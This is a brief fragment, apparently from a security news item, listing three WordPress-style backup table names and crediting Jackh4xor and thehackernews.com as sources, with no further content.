wp_backupoptions
wp_backuplinks
wp_backupcomments

News Source : Jackh4xor



Source: thehackernews.com